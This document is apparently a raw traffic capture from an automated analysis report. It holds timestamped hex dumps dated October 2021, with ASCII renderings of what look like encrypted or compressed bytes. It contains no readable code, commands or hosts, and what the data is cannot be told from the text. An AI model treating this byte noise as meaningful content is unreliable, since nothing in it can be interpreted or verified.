8f 72 4c 93 15 13 fb 11 90 b2 bd 9e 0f 04 22 36 c1 2a c0 18 f9 34 15 a8 cf bc 1a 64 2a 2f 6c e8 82 a1 b2 84 bc 32 f2 da 89 19 90 26 b2 60 9f 7c b7 ea bb 6a 55 68 c4 50 6d 4e 07 3d f9 ce 90 91 0e 6d f3 d9 b2 2b
                                        Data Ascii: 9U2"Jc>2(FHWuF*J-ZH\<YE|1eBrV.*PgbGgxP,g+.#[r8fH9OId74`658+"!LgiY!=xBrL"6*4d*/l2&`|jUhPmN=m+
                                        2021-10-13 14:33:05 UTC177INData Raw: fa 82 0f f3 d2 cc 19 78 12 8a 77 36 ba 78 17 94 b1 f8 29 07 b3 95 3e 7c a7 e3 ee 58 0b 5c 60 b2 51 a8 06 32 23 55 e7 04 59 04 3e ac 04 7c 5e 05 47 92 2f b6 5d 41 69 01 f9 3b 97 ff 15 0f 61 49 e7 df 62 0e dd 3e 37 eb 5e d3 d8 e3 82 2c d9 4a 63 ab 56 02 70 de 1d b7 0d 84 e6 11 d5 cf 9f 4f 8b a4 c1 3d 67 a9 02 6c 3f 3b 2a c8 b8 f2 da b8 3e 91 89 7f 8d 7b 13 b3 32 20 75 02 0f c1 57 a4 0f 5e 0f 6c 43 d7 1f 01 77 92 31 99 59 df e6 03 d5 9f 67 2d 8f 89 84 ab 7b b6 11 54 8e 17 d9 8d 03 8a a2 0b fd 9a 98 16 56 6a 43 c8 36 8a 42 8e 66 26 9f a8 06 f2 10 d7 7e fa 67 e1 70 25 1a 30 fe bb 11 cb dc db 33 55 13 bf dd 8c 34 30 c6 f3 62 57 10 16 7a 8b 8b 4c 29 fd 73 86 0a 2b 37 b1 15 bb 29 12 ba 7b 9b 81 4a 3a 2e 11 5c 6b 85 c6 1f 17 e6 26 26 2c 26 d5 27 22 e2 d4 e2 49 59
                                        Data Ascii: xw6x)>|X\`Q2#UY>|^G/]Ai;aIb>7^,JcVpO=gl?;*>{2 uW^lCw1Yg-{TVjC6Bf&~gp%03U40bWzL)s+7){J:.\k&&,&'"IY
                                        2021-10-13 14:33:05 UTC178INData Raw: 0b 54 d5 56 46 19 f2 98 3b 72 36 33 76 ad 81 69 de eb 6e 53 cf 63 ab 0a 10 98 64 f2 32 a0 3d d8 27 94 b6 5e 8d e8 92 e9 6c 4b 3e 36 f7 6e a3 fe 81 32 10 f3 66 90 c9 a5 7c 1c ad fb 1b 52 41 de f9 4f 91 a4 11 25 0a 3f 55 55 32 4c a8 40 5d eb 7a 0e e1 7d b8 81 6c 93 39 f8 b4 3d f2 93 5d 7e 0a 30 63 65 59 bb 52 f9 f7 71 ae 17 72 0d 7d 8c cb 28 04 a0 43 fc 44 00 f2 1e 1b ea 3d 2c 7b 92 1b 6f 88 1a ce cf 22 6a d3 f5 e4 33 95 46 39 a5 d7 15 26 58 d1 36 8e 36 89 8f b7 d8 15 e4 f3 af cc f7 fb 10 d4 76 d0 2e 05 d9 33 5a f8 54 07 a3 15 3c e1 a1 05 7a 25 61 8e 8b b2 2c a8 34 b2 21 e4 e6 e2 cd 79 c6 46 ef 7c 23 05 13 12 2d a7 5a a7 fd 7c 37 24 7f ff 68 0f 17 c9 e5 3c 63 e8 49 43 15 c4 b6 d3 a5 e3 1a ac db 0d 64 4d c2 7f a1 85 f5 b7 70 84 5c 91 d7 9a 9d a9 1f d9 97 50
                                        Data Ascii: TVF;r63vinScd2='^lK>6n2f|RAO%?UU2L@]z}l9=]~0ceYRqr}(CD=,{o"j3F9&X66v.3ZT<z%a,4!yF|#-Z|7$h<cICdMp\P
                                        2021-10-13 14:33:05 UTC179INData Raw: 1f ef bb 98 f4 a8 8c 0e 99 40 6b 84 37 13 48 60 0b 93 5c b9 c5 a4 b0 af 82 17 8c 50 96 3a c2 d6 a1 03 44 cf 11 36 55 41 08 df 3d 66 47 d9 b5 0d dd 42 60 98 bc 06 61 af f5 d3 13 a4 95 98 ca 61 88 0d 18 68 5d f2 64 7d 39 36 10 81 f0 c7 3c 54 7a 6a a2 61 80 98 93 83 e6 30 38 c4 29 c4 56 9b 04 16 7f 39 56 dd a1 27 7e 8d b3 51 03 28 af 16 ac e8 b1 4e ba 20 ee 6c ca f8 55 5e e8 0b 94 81 91 4f 0e 3f 2e 35 d1 b6 80 49 82 1c 0b d0 e1 4c 09 35 7d 10 9e 21 6c 9c bc 68 c8 85 96 b8 ef 04 7c 09 ac c0 af 7e 7c d5 01 0b 37 3c 78 87 52 1c 0a 69 f9 77 48 25 50 8b f3 45 87 fa 48 c4 7b 0b 2e c0 d4 fa 9d 70 b5 20 aa d3 37 8d 47 ae c8 2e bd d1 9c 5e 05 bb 4d 51 85 bd 13 50 b1 cb ce df 50 d6 cb 5f ac 96 ad ec 93 ac 93 41 63 2e c7 d6 2a 90 46 8f 26 f3 08 ae e1 14 8e eb c3 6b 01
                                        Data Ascii: @k7H`\P:D6UA=fGB`aah]d}96<Tzja08)V9V'~Q(N lU^O?.5IL5}!lh|~|7<xRiwH%PEH{.p 7G.^MQPP_Ac.*F&k
                                        2021-10-13 14:33:05 UTC180INData Raw: 94 cb 5b 71 5e 06 74 32 c3 bc c0 2d 4e d2 4a cf 29 b0 4a 66 58 2b 6e 7e 82 60 20 62 8e 4b 14 e8 d9 1b 1d 22 b0 f6 9f 14 00 0c a5 0c b3 38 94 52 c4 4a 05 ab f9 25 02 77 68 14 15 af e2 29 1a 51 6a 9d 1d 06 91 a2 66 8f e0 b9 5d 34 33 76 3b 17 e1 c4 08 8a 2c b2 f9 07 25 12 98 64 64 a4 3c ef 1b c3 eb cb e2 43 c7 90 e9 6c dd a8 ca b7 8d 47 81 fc ec f8 dc 64 90 c9 33 ea d2 b6 30 ff 2d 3c de f1 63 93 a4 11 b3 9c 0d 22 b6 d6 33 d5 62 76 c7 78 0e e1 eb 2e 7a 9e 45 dd 87 c9 79 b8 bf 5f 7e 0a a6 f5 d6 f6 58 b6 86 8a 17 3b 3b 70 0d 7d 1a 5d 5f 1b 77 a7 83 39 88 45 32 19 ea 3d ba ed 73 c0 8c 6c 65 b3 65 f3 46 d1 f5 e4 a5 03 e2 7c 72 33 6a 5b 94 22 1a 8c 36 89 19 21 fa 0c 04 17 d0 b1 19 e9 3d d6 76 d0 b8 93 17 2d 8e 1c 2b 7a b3 2a 11 e3 a1 05 ec b3 0b ad 6b 56 53 d5 06
                                        Data Ascii: [q^t2-NJ)JfX+n~` bK"8RJ%wh)Qjf]43v;,%dd<ClGd30-<c"3bvx.zEy_~X;;p}]_w9E2=sleeF|r3j["6!=v-+z*kVS
                                        2021-10-13 14:33:05 UTC182INData Raw: 5d 0b 8f de 80 3c 57 85 bf 43 19 d2 3f b8 15 59 13 12 6a 75 89 1d 4c b3 7c 95 67 62 cd 6e f5 17 26 26 10 2c 7b 73 14 ac 79 50 f7 23 2f 87 78 10 15 70 26 36 a3 c0 31 4c c4 7e 90 e0 a9 56 ae e5 29 3d 0d 5f e7 89 04 6c 35 9b 40 6b 12 a1 b6 e9 9c ef ec 21 77 07 9f b2 af 82 81 1a 4a 9b d8 26 a9 dc f3 60 f7 13 36 55 d7 9e 10 5e 9b a3 a6 c8 1f da 7a 62 98 bc 90 f7 eb b4 31 f7 db e8 ac ac 59 8a 0d 18 fe cb f8 94 84 dd 49 6d d4 b9 ff 3e 54 7a fc 34 78 28 7a 77 fc 9b 47 90 fc 2b c4 56 0d 92 22 42 fe b2 a2 dc be f5 b5 b1 51 03 be 39 8a 5a 0a 55 31 c7 9b 03 54 c8 f8 55 c8 7e 55 f9 46 75 30 73 e3 e2 0d d3 b6 80 df 14 e0 d1 32 05 33 74 c8 52 29 9c 21 6c 0a 2a 24 41 47 72 c7 92 1b 71 30 ae c0 af e8 ea 5e 18 e8 d3 43 05 c6 20 25 08 69 f9 e1 de ba ae 4a 17 3a fa 99 1b fd
                                        Data Ascii: ]<WC?YjuL|gbn&&,{syP#/xp&61L~V)=_l5@k!wJ&`6U^zb1YIm>Tz4x(zwG+V"BQ9ZU1TU~UFu0s23tR)!l*$AGrq0^C %iJ:
                                        2021-10-13 14:33:05 UTC183INData Raw: bf d5 4a 66 37 93 9e 5d 8c 7f e2 fb 34 86 b5 d0 e7 1e a7 6a 38 78 20 13 dc 8a cc 51 64 4d ed 86 ea 75 67 46 7d 9c 90 c2 eb 29 9c e1 0d 23 3d ee f3 e4 e6 7e 07 00 b4 7b 07 b7 76 4e 93 83 13 fc 05 70 b4 26 9c 80 41 76 32 c3 2a 56 18 76 37 ae b0 54 be 73 22 5a 2b 6e e8 14 a1 d6 91 6a 34 69 d8 c1 5f 1f 22 b0 60 09 7c 6c e9 41 73 ce 6a ef 16 c6 4a 05 3d 6f ce f4 87 8c 6b 68 db b8 6d 18 51 6a 0b 8b d4 c7 47 82 f0 9d 2f e8 70 31 76 3b 81 77 d8 22 7b c8 cd 84 bf b2 56 9a 64 64 32 aa 3c 9f 26 0f b4 9f 99 36 d4 eb 6c dd 3e 5c f1 15 b6 65 83 91 04 0f 20 92 c9 33 7c 44 ac f6 1a c9 43 a3 ec 6d d6 a6 11 b3 0a 9b 52 a0 29 d7 aa 1f 48 ab 3d 0c e1 eb b8 ec 6d 60 3f 63 b6 04 e7 f5 1a 7c 0a a6 63 40 5e fa 4a 62 f5 6a bb 90 35 0f 7d 1a cb c9 06 79 45 67 46 f5 e7 bb 5c e8 3d
                                        Data Ascii: Jf7]4j8x QdMugF})#=~{vNp&Av2*Vv7Ts"Z+nj4i_"`|lAsjJ=okhmQjG/p1v;w"{Vdd2<&6l>\e 3|DCmR)H=m`?c|c@^Jbj5}yEgF\=
                                        2021-10-13 14:33:05 UTC184INData Raw: 01 5c 0f fa 43 13 19 11 7c 09 33 7e 08 09 e8 01 d5 09 67 4b bb d6 84 30 79 77 40 a0 80 15 d9 1b 03 61 a3 b8 eb 01 9a b5 07 70 4c ca 36 1c 42 b4 60 23 9f 33 04 70 41 ef 71 f8 67 77 70 73 1b a9 e8 20 13 97 8e 82 3c 57 13 29 dd 3a 33 db c7 68 60 69 42 68 75 89 8b da 29 99 72 83 1d b0 35 a8 47 24 26 10 ba ed 9b 41 4d 9d 2f 8a 5e 90 d7 7a 10 15 e6 b0 26 de 24 d5 33 b9 e0 0e b0 ab 56 ae 73 bf 2f 08 b0 03 f6 79 ac c5 cb 42 6b 12 37 20 4d 1d 0b 08 5e 0a e5 4c e2 ad 82 81 8c dc a7 f6 cb 4d a3 8e 64 c6 42 34 55 d7 08 86 38 48 47 42 b7 62 fc 6c 33 9a bc 90 61 7d c4 51 05 3f 97 d1 eb 2e db 0f 18 fe 5d 6e 62 69 39 ad 12 a9 d1 aa 6f 56 7a fc a2 ee b2 ea 85 18 e4 3a 19 56 7a c6 56 0d 04 b4 79 c3 57 46 a3 c3 5f 3e e0 53 03 be af 1c 9e fb a6 d5 b8 e6 cf bd 99 fa 55 c8 e8
                                        Data Ascii: \C|3~gK0yw@apL6B`#3pAqgwps <W):3h`iBhu)r5G$&AM/^z&$3Vs/yBk7 M^LMdB4U8HGBbl3a}Q?.]nbi9oVz:VzVyWF_>SU
                                        2021-10-13 14:33:05 UTC185INData Raw: e3 32 9d 5f db 1c d5 1a 3f 4e cc 73 54 0f 16 31 50 4a 93 1e ce 2f be 4c 36 66 19 e9 1d 94 f4 a0 b4 7d 18 a4 ad 6b 14 51 2e 67 e6 bd 7f a0 8d 69 5b 87 5e 6f 9c 39 64 14 03 81 06 59 fb c8 ab b9 80 ac 89 48 66 37 05 08 a2 40 9c 06 84 49 ed 88 8c e5 1e a7 fc ae bd 19 c4 38 f5 b1 dc bb 11 ef 86 ea e3 f1 27 68 7c 74 bd 96 87 65 bd 0f 23 3d 78 65 0b eb aa e3 7f c9 ab 9f eb 74 4e 93 15 85 6d 3a 90 50 59 e1 72 fa 2a 30 c3 2a c0 8e 6f 63 7a 54 2b c3 67 44 07 29 6e e8 82 37 24 d1 8a d0 16 a5 f4 5b 42 20 b0 60 9f ea 21 19 93 97 b1 17 b9 34 9b 48 05 3d f9 58 06 11 6b 8f 17 a6 cf ad 45 53 6a 0b 1d 42 b0 eb 62 14 e2 52 70 9e 6c 74 3b 81 e1 4e 0d af 2f 29 fb c2 08 da c7 66 64 32 3c aa 3e 06 ee 50 e0 e4 ea 79 b6 6e dd 3e ca 67 88 54 82 67 ee 79 f1 6a f0 cb 33 7c d2 3a 1d
                                        Data Ascii: 2_?NsT1PJ/L6f}kQ.gi[^o9dYHf7@I8'h|te#=xetNm:PYr*0*oczT+gD)n7$[B `!4H=XkESjBbRplt;N/)fd2<>Pyn>gTgyj3|:
                                        2021-10-13 14:33:05 UTC187INData Raw: d2 01 3e 62 e9 e1 4e d1 c5 f9 d1 3c c8 68 b8 18 0d 5e 68 47 7f 79 92 29 90 fc 86 27 87 5f 92 6a ab 48 d9 90 5b 97 aa c3 6c b8 b5 d4 c3 71 14 e2 ea 2d 01 96 7c d3 6e 10 26 2b ad d8 cf 07 bf 4e 17 ee 6f 00 6f 6a 40 b0 dc 74 77 02 e5 6a 1d 33 03 1c 9f e4 9c 99 33 4f 4d 23 c7 0d a1 b9 14 4c 81 4a 1d 6b 5e 9d 65 89 6b 17 73 88 ee 14 89 03 19 d4 e1 1b 4e 2d 8e b9 fd 59 fb 4e e0 d3 80 37 4c c3 5c a3 91 e8 83 6d 56 ba 9c e1 19 ed 3d 7d 27 20 29 c9 6a 34 9a cc 4f f0 6b 38 75 0c cd 54 cd 13 3d 2c 13 db 7a 88 34 07 78 44 f6 df 09 03 78 61 14 dc 03 35 ba 47 32 5d d1 b9 aa 63 a8 bd a1 2d 2a ae 08 bd c9 90 07 25 0d 79 64 22 13 a6 b7 dd 8d 63 ed e5 76 8f b6 34 ac 43 80 0b 62 2c df 59 aa d6 db f5 ce 88 37 3b c4 f6 11 a1 81 ba 8b 2d 1c 65 41 9a b4 42 91 f8 ea 46 1c 89 da
                                        Data Ascii: >bN<h^hGy)'_jH[lq-|n&+Nooj@twj33OM#LJk^eksN-YN7L\mV=}' )j4Ok8uT=,z4xDxa5G2]c-*%yd"cv4Cb,Y7;-eABF
                                        2021-10-13 14:33:05 UTC188INData Raw: 16 99 b1 b8 c9 d8 5e e1 cb 16 b8 67 86 27 93 35 98 e9 6a e9 c5 0a 0d 75 45 84 07 28 25 ec e8 bb 8d 51 f0 a3 02 9c fd 27 66 9e a0 96 2b a7 85 72 48 07 2d 99 7e 1e 49 0d 8d 81 4b 3a 02 cf 5a da 75 63 ad 6c bd 56 e5 f2 63 ce 82 14 6e 71 0b 17 a3 3c 3b df f9 3d 51 e0 aa 4e 60 e8 ea 88 1d d1 43 2d 9b 95 fa e4 79 ab 50 f7 4a 7b 22 ce 2e 21 8f 9d f3 b7 59 50 31 cc 11 ea 15 73 5d 01 27 18 c4 3c fa 04 43 8f 35 70 8b 78 8f cd e0 89 3c 6f f7 db e3 bd 94 1c 31 0c 22 99 cb 41 c8 75 21 f7 c5 5f ef b2 65 1d 4c c6 96 16 eb 89 f5 c8 07 af 3d 79 c0 32 ee 14 05 14 ae 94 48 1c 76 22 86 5c 12 fc 10 2a b6 1d 96 7b 00 d7 01 88 20 d9 1c 55 11 f4 b6 18 ba 6e 72 c4 21 4f ec b8 84 98 80 1d 37 18 cb 57 13 34 26 8a 45 8c 7c 18 ee 9d 54 a0 6a f0 54 74 78 b9 39 a8 ca 9e 94 d6 6d 44 df
                                        Data Ascii: ^g'5juE(%Q'f+rH-~IK:ZuclVcnq<;=QN`C-yPJ{".!YP1s]'<C5px<o1"Au!_eL=y2Hv"\*{ Unr!O7W4&E|TjTtx9mD
                                        2021-10-13 14:33:05 UTC189INData Raw: 1f b3 f2 c1 02 c0 d4 2f 3f a8 04 fd 70 eb ac 49 01 00 ba d8 0c 94 b4 32 38 88 bb 56 fa 1c 0d 1d 5d f9 50 a1 02 bc 37 60 f0 3b 5b 41 2d b4 1f 9f 5c 21 52 df 2d 0e 5a 69 42 5e ee a0 9d 51 12 28 76 76 e7 76 77 60 c8 ea 37 bd 62 12 cf b2 83 82 ca c5 73 0c 52 16 79 5c 04 fc 0b 11 c2 70 c2 0b 9c c5 9c 02 c3 c2 68 17 02 2d 27 3c 2e 1f b5 f1 cd 6c 3e 4b 93 d2 95 d2 13 c0 1f 43 6f f5 0c 35 7b d3 04 cd 0e f4 62 a4 0a 96 78 4e 16 f7 59 ea e9 3b f0 8d 7d aa 8e 78 9e c2 7f da 10 cb aa 9a df cc 01 85 86 6c ed 75 9f 97 45 61 4c cb 33 68 60 a9 7c b4 9b bb 2a 57 13 9c 77 20 4e 56 6a 1a 1a 75 cf 9f 09 8f df c2 35 5b 08 0e dd 3b 35 23 de e9 60 10 35 79 75 8d 8a 76 0c 13 74 99 1f c2 3d 4e 12 da 26 cd 94 55 9a 46 4b bd 23 cb 5d ea 85 11 0a 66 e0 22 27 2d 27 92 36 c0 e1 3e e3
                                        Data Ascii: /?pI28V]P7`;[A-\!R-ZiB^Q(vvvw`7bsRy\ph-'<.l>KCo5{bxNY;}xluEaL3h`|*Ww NVju5[;5#`5yuvt=N&UFK#]f"'-'6>
                                        2021-10-13 14:33:05 UTC191INData Raw: 08 34 42 5d c2 d5 3e 4d 0b 65 c7 bd e4 5a 5e 2e ec 4f 71 90 c5 b9 19 3d 7c 37 e5 31 bf 38 77 4a 1f 96 98 c6 ea be 0e ff 51 be 15 45 b1 06 5d c6 43 f1 a8 9e a9 a2 a8 51 27 7c bf 3d e3 8d f6 46 b8 c5 76 bf 59 e7 e8 5e 17 cc 0a 45 58 e6 f4 98 84 62 d0 70 c3 5f 37 01 ef 2f 7f 24 f5 19 ac b0 92 9d 5d ad 8e a1 59 7e 6b 1f cf c5 6a e6 fc cc 3a 73 8b 3e 1a 16 56 72 81 9e fe 77 40 ff e1 e4 6f c5 e4 72 84 1d f3 43 d0 64 2c 44 b9 35 55 00 1e 25 57 6a 97 8a fe 88 b9 f1 6a b9 37 c7 1c 0b f0 cf ab 52 32 8d ac 42 6f 93 25 2b e7 24 77 ac 8f 86 5d 98 4e 86 ea 67 65 c9 2d 39 07 14 cb 47 b3 b7 86 a6 d6 45 6e b5 02 c2 a3 bc bc f3 86 0d ee 1b f9 7c 37 9e ff 5b ab 0c f4 e7 f4 59 cf 82 66 b1 87 c8 c6 a0 20 0d 7b 26 91 7b 87 bd e2 46 13 18 7c f2 0f 5c b0 21 7c cd af f2 87 ca 4a
                                        Data Ascii: 4B]>MeZ^.Oq=|718wJQE]CQ'|=FvY^EXbp_7/$]Y~kj:s>Vrw@orCd,D5U%Wjj7R2Bo%+$w]Nge-9GEn|7[Yf {&{F|\!|J
                                        2021-10-13 14:33:05 UTC192INData Raw: 24 8d b4 e9 e2 a9 71 76 0a 32 66 eb 72 74 50 f7 f7 d2 bb 3b 72 96 6a 83 e7 71 06 e5 56 23 68 a6 e7 b7 0c 2b 11 fa 7b 58 12 cc 8a 27 ce 76 37 75 d3 b6 e4 b6 95 ff 3b 00 d5 73 26 b8 c4 7d 8e 45 89 c2 b7 99 01 19 f1 fe cc 7a ee 01 d4 6b d0 d1 05 64 31 48 fa a9 07 98 03 7b e1 22 05 f7 25 27 9a ee b0 2a a8 43 a4 a0 e4 65 e2 1e 79 b7 44 7a 7e 58 04 e7 04 04 a7 1f a7 ca 7c 32 31 dc fd b4 0f b2 df a2 3c c0 e8 cc 43 2a c7 f3 d1 1b e3 fc bb 19 0d 4f 4d 11 7f b3 93 f0 b5 0e 86 25 87 c6 9a 80 a9 69 d9 ea 53 2c ab e1 6c bc ad 6f c1 b0 15 f3 c5 7b 01 87 7c 9e 7b 0e 25 12 ad 64 e4 10 bc 77 17 2a 5c 4a 6c 03 40 34 f7 3b 74 73 e5 4a 0b f5 01 b5 9e 74 bb 92 30 e6 4c 52 cb 54 a2 00 14 f2 8d 46 1c 02 5f c2 7c df 6b 96 73 67 ca 73 8a 82 19 75 c5 80 4e e4 8e 3b ed 34 f8 67 e3
                                        Data Ascii: $qv2frtP;rjqV#h+{X'v7u;s&}Ezkd1H{"%'*CeyDz~X|21<C*OM%iS,lo{|{%dw*\Jl@4;tsJt0LRTF_|ksgsuN;4g
                                        2021-10-13 14:33:05 UTC193INData Raw: f8 47 19 41 26 08 4b 0d 04 e7 58 ea 4a a0 a1 a3 43 4d bd 51 03 e1 a1 b0 80 0e b3 e7 b6 59 c1 6e ca c0 4a 0a e6 55 92 94 a1 e2 13 e3 0f 81 d9 8c 9e df 82 a4 37 0c fd 31 09 23 4f 23 81 21 6c 05 b5 2c d7 63 94 69 c7 0c 7d 0b ac b5 80 24 61 5e 07 89 11 5c 5b c6 70 e4 11 ab f7 e1 48 70 7a 83 d9 38 87 29 65 72 52 0b 2e 84 f9 c9 86 96 b7 56 81 ec 3c 8f 47 5a ce 8d a3 00 9d 8d 0a 04 43 f6 a7 04 1a 92 bf 5d ce 22 54 f2 c7 22 ac 9a ac 2c 9d ae 93 d3 63 d3 c6 32 28 e8 46 60 04 f3 08 a8 e1 85 8e 5f c4 8a 03 7c fe 65 46 c1 a9 74 28 fa 88 2f 49 a3 2d 1b 5a 42 48 a9 8d fc 5e 57 0b e9 5a 46 7c f4 a4 92 be f2 fa aa 67 2e 81 93 71 2a 0f 05 a7 51 2e e9 f8 df 52 bc bd 75 65 0c e9 1c 02 eb 46 91 9b 18 d9 8d 79 5d 53 2f 67 c7 2a 68 2e 8a 8f 7b fb 47 5b c3 3b 47 15 1a 17 04 48
                                        Data Ascii: GA&KXJCMQYnJU71#O#!l,ci}$a^\[pHpz8)erR.V<GZC]"T",c2(F`_|eFt(/I-ZBH^WZF|g.q*Q.RueFy]S/g*h.{G[;GH
                                        2021-10-13 14:33:05 UTC194INData Raw: 4e 81 5d 11 b6 79 81 51 57 12 bf 7b 1b 59 3d c7 15 8f 2b 7f 6a 74 89 7b 4d 46 6b 71 65 ee cc 44 cc 14 26 d4 11 cb 7b 99 17 b2 7a 5e f7 5f 16 7c 79 63 15 e4 26 dc bb 53 33 30 c4 1b a8 97 a9 54 ae 8f 28 58 09 b8 e5 09 05 db 0c 9b 40 95 13 4e b6 4c 86 f6 ef 25 77 e7 a6 93 ad f9 81 8d 4a 83 de bb ab a3 f3 41 cf 6c 36 54 d7 2e 12 45 80 47 a4 92 1d 83 40 61 98 94 92 1e eb c6 35 38 db 14 ac ea 63 a2 0f 99 fe 47 f8 3a 99 70 4f 0b d4 5f c7 77 50 4b fc 9c 7b 07 7a a0 fe a6 44 ae c2 18 c4 14 0e bd 26 48 df 10 a3 1a ba 6b 8f c7 52 3f bd 96 8a e6 0d 1c 33 f7 9b 8f 6a 65 f8 2b c8 d5 4c 05 67 fa 2b 51 fa 47 2e 84 af f5 df b0 f9 55 36 92 31 71 c8 23 12 cd 20 83 0b 4a 25 a2 65 13 c3 a5 1c 04 0c cd c7 c0 ef c2 59 d6 ea 1f 49 49 cc 35 15 19 79 de f1 31 a8 1f 7e 6f 2c 2f 8d
                                        Data Ascii: N]yQW{Y=+jt{MFkqeD&{z^_|yc&S30T(X@NL%wJAl6T.EG@a58cG:pO_wPK{zD&HkR?3je+Lg+QG.U61q# J%eYII5y1~o,/
                                        2021-10-13 14:33:05 UTC195INData Raw: a9 e5 88 b6 28 0a 52 65 af a2 cf da 8f ea 58 88 93 a6 8e 71 c9 9c 09 bd 67 83 bb 99 b8 94 40 21 89 ea 8f 91 07 16 69 33 de d6 98 f3 b9 d2 0d 6b 70 39 b0 58 ac d9 30 4c 86 ab 03 d1 00 2f e3 7c 20 5f 11 fd d3 29 f2 17 68 47 00 c3 67 a9 7b 1d 5b 3b dd 4f ca 49 33 31 45 5d da 82 d4 57 e1 fe 05 26 d8 a6 7c 7c 46 e5 29 f1 08 12 d8 a7 25 dc 3f f0 3e b0 79 37 3d ab ab 67 f5 23 07 61 e8 fd 2b 4e 3e 23 65 69 e7 82 44 2f 97 99 79 11 5a 46 13 6b e0 88 aa 6d 5e 2e 8b 90 dc 7c 79 f7 0a 05 40 45 5c 0c 25 b0 d6 d1 99 be fd bc 25 b3 4a fc c5 88 f3 e6 e0 88 4d 9f 12 a6 fd 33 28 bd e5 73 6d 19 75 de a1 09 a4 a4 43 d6 6b 69 07 fa 5e 45 99 54 48 bd 15 5b a8 85 cc 4b 5b 75 69 e0 d5 1d ae ff 29 4f 3c a6 37 b9 17 33 24 b5 c1 17 f3 58 33 4e 2e 52 8a 6d 33 70 41 e6 21 fc b8 49 4f
                                        Data Ascii: (ReXqg@!i3kp9X0L/| _)hGg{[;OI31E]W&||F)%?>y7=g#a+N>#eiD/yZFkm^.|y@E\%%JM3(smuCki^ETH[K[ui)O<73$X3N.Rm3pA!IO
                                        2021-10-13 14:33:05 UTC196INData Raw: 02 16 42 09 0f 28 16 41 5a a2 7e 32 66 e4 1e 5e e8 49 80 9f 06 ee 8f 52 d3 4d 1a 9e 11 c6 d5 15 bc d8 03 7a f7 5e 8e 29 9a 29 00 72 0f 9c 36 ce 14 18 23 93 9d 08 52 8f 57 bb 71 b0 31 e1 17 d6 6e 10 a3 0b 13 c5 b9 f4 63 1e 45 bf bc 4c 34 5f 93 15 03 7c 10 0e 23 89 ee 1a 29 0d 25 65 78 9b 35 8e 42 26 65 47 ba 3f cc 17 0f 2c 2d b1 09 16 c2 2f 10 5d b1 26 47 ed 26 51 66 c4 83 fe e2 cd 01 ae 16 7e 2f 6f ee e5 93 53 ac 4f f1 32 3c 12 7a d9 3b e3 4f 87 30 12 a0 de e7 af c0 d9 8c 09 ff dc 84 f3 a1 b6 3c cd 57 6e 55 90 50 10 70 d8 45 c5 ed 1f 9e 18 60 fb e4 90 05 b3 c4 50 49 d9 f3 f4 eb 04 d0 0d 5a a7 5d bb 3b 9b 7f 12 10 91 88 c5 7a 0d 7a bb fb 78 fa 27 91 9f bf 47 7b 9f 29 a7 0f 0d 60 7b 79 ba 0d a0 c7 e7 5f e8 ea 51 41 e4 af c9 c4 0e f7 69 ba de 95 6e 8c a2 55
                                        Data Ascii: B(AZ~2f^IRMz^))r6#RWq1ncEL4_|#)%ex5B&eG?,-/]&G&Qf~/oSO2<z;O0<WnUPpE`PIZ];zzx'G{)`{y_QAinU
                                        2021-10-13 14:33:05 UTC198INData Raw: 28 18 86 a4 de d1 9d 8a a5 02 4c f2 f8 1e 3a 42 79 c3 35 2e d5 91 bc 3a db cf 26 0b 7d 8c 1d 5a 99 2b ca f4 7e bc ad 1f 2f 27 71 32 88 42 1c 41 ec ea 59 9d 3b 2f 9d 79 0d 73 46 79 62 21 ab 40 fc aa e9 99 b8 2e 03 37 4c ed f6 e3 e1 94 d3 5a 84 93 bd 83 7b a7 aa 59 c8 4e 81 98 85 a9 b9 21 28 88 f2 b5 96 14 42 3a 1f e2 de 99 e6 ad 86 4b 4c 51 1c 96 79 b0 ea 60 18 b4 d8 27 c1 29 3b e0 70 40 08 61 f7 c4 3a e8 17 42 1b 5e a7 4f b2 4c 1d 51 2d b2 4f db 67 22 2a 44 03 a1 ef c0 43 e1 8c 65 71 b6 90 54 78 51 c3 01 f8 19 21 a7 c6 18 df 27 dc 23 b7 2b 62 58 f9 8f 62 f5 38 08 7b bc aa 2b 59 23 0f 6f 78 ba c4 2d 05 9e a3 4e 13 5e 56 76 7e ef 85 91 63 1a 41 a4 9c bf 4a 75 ff 0d 0a 7b 52 4a 51 4e 8c b6 a5 fc 9e d7 87 1a b4 4c a5 9f e5 c4 ed f5 ba 65 83 0f f1 ab 5f 19 d2
                                        Data Ascii: (L:By5.:&}Z+~/'q2BAY;/ysFyb!@.7LZ{YN!(B:KLQy`');p@a:B^OLQ-Og"*DCeqTxQ!'#+bXb8{+Y#ox-N^Vv~cAJu{RJQNLe_
                                        2021-10-13 14:33:05 UTC199INData Raw: 7c 04 ab b8 5d 15 89 ab 22 45 93 29 a1 bd e3 c5 df ad 59 1d 3d 31 7f 23 fc 70 de 68 f0 b2 fe a5 ff 9d da ec ad 9e 10 06 c5 76 09 51 d9 7e b8 c0 71 d8 83 57 6d e2 2e e5 1a 61 40 32 ef 18 89 7d dd 25 73 01 0c 7b 1e 17 2e 4c 83 0c 01 50 90 2c 79 8d 01 b2 fa 13 e4 c6 5e f0 2c 0b a2 70 cc f4 56 ac e1 77 69 d0 3b e9 1b ff 1f 09 31 39 b8 44 ef 2c 6c 25 b0 f1 3a 71 fd 75 ed 32 99 17 95 05 c1 7f 4f ab 2d 63 da b5 e3 5d 23 7a d0 b3 58 55 4e a0 15 2e 4b 7d 0f 3a eb e1 29 4a 1f 30 0a 73 a1 50 af 61 4f 49 7e f8 1a e8 72 4a 33 59 83 2e 41 e0 1a 42 70 95 56 49 d4 55 56 31 83 85 dd b0 cc 25 de 1c 47 5c 6c b9 a6 98 6b df 69 99 04 02 61 47 d9 3e e3 09 ba 2e 0e b5 c7 c2 dc e7 81 de 2f d1 b9 b2 d8 c4 f3 27 bf 74 57 21 b2 08 5d 4d ec 31 cd d6 7e 8f 34 24 fd d0 f5 06 8a b0 50
                                        Data Ascii: |]"E)Y=1#phvQ~qWm.a@2}%s{.LP,y^,pVwi;19D,l%:qu2O-c]#zXUN.K}:)J0sPaOI~rJ3Y.ABpVIUV1%G\lkiaG>./'tW!]M1~4$P
